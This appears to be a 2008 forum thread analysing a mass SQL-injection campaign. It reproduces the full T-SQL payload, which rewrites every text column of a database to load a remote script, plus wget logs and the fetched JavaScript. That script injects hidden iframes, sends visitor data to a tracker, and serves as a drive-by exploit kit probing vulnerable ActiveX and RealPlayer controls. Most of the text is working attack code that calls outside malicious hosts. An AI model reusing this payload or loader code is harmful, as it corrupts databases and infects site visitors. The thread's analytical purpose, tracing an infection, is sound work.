DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor


Code: [Select]
--14:08:09--  http://www2.s800qn.cn/csrss/w.js
           => `w.js'
Resolving www2.s800qn.cn... 121.11.76.85
Connecting to www2.s800qn.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]
window.onerror=function()
{

document.write("<iframe  width=0 height=0 src=http://www2.s800qn.cn/csrss/new.htm></iframe>");

return true;
}

if(typeof(js2eus)=="undefined")
{
var js2eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

document.write("<iframe  width=0 height=0 src=http://www2.s800qn.cn/csrss/new.htm></iframe>");

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}


Code: [Select]
--14:11:17--  http://www2.s800qn.cn/csrss/new.htm
           => `new.htm'
Resolving www2.s800qn.cn... 121.11.76.85
Connecting to www2.s800qn.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script src="http://s46.cnzz.com/stat.php?id=1084964&web_id=1084964" language="JavaScript" charset="gb2312"></script>
<SCRIPT>
document.write("<iframe width=50 height=0 src=flash.htm></iframe>");
document.write("<iframe width=50 height=0 src=ani.htm></iframe>");
document.write("<iframe width=100 height=0 src=cx.htm></iframe>");
document.write("<iframe width=100 height=0 src=mi.htm></iframe>");
window.status="完成";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=20 height=0 src=06014.htm></iframe>");
try{var n;
var ll=new ActiveXObject("snpvw.Snapshot Viewer Control.1");}
catch(n){};                     
finally{if(n!="[object Error]"){document.write("<iframe width=100 height=0 src=ff.htm></iframe>");}}
try{var w;
var ml=new ActiveXObject("DPClient.Vod");}
catch(w){};                     
finally{if(w!="[object Error]"){document.write("<iframe width=100 height=0 src=xl.htm></iframe>");}}
function test()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="6.0.14.552")
document.write("<iframe width=100 height=0 src=real10.htm></iframe>");
else
document.write("<iframe width=100 height=0 src=real11.htm></iframe>");
}
test();
</SCRIPT>
</HEAD>
</HTML>
<iframe width=50 height=0 src=tr.htm></iframe>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/2204425.js"></script>
<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>


Code: [Select]
--14:14:26--  http://js.users.51.la/2204425.js
           => `2204425.js'
Resolving js.users.51.la... 121.11.69.211
Connecting to js.users.51.la[121.11.69.211]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]
document.write ('<a href="http://www.51.la/?2204425" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_7.gif" style="border:none" /></a>\n');


Code: [Select]
--14:18:32--  http://www.51.la/?2204425
           => `?2204425'
Resolving www.51.la... 222.88.95.2
Connecting to www.51.la[222.88.95.2]:80... connected
HTTP request sent, awaiting response... 200 OK


Title: Re: SQL Injected jscript sites
Post by: JohnC on October 14, 2008, 03:55:19 pm
Thanks.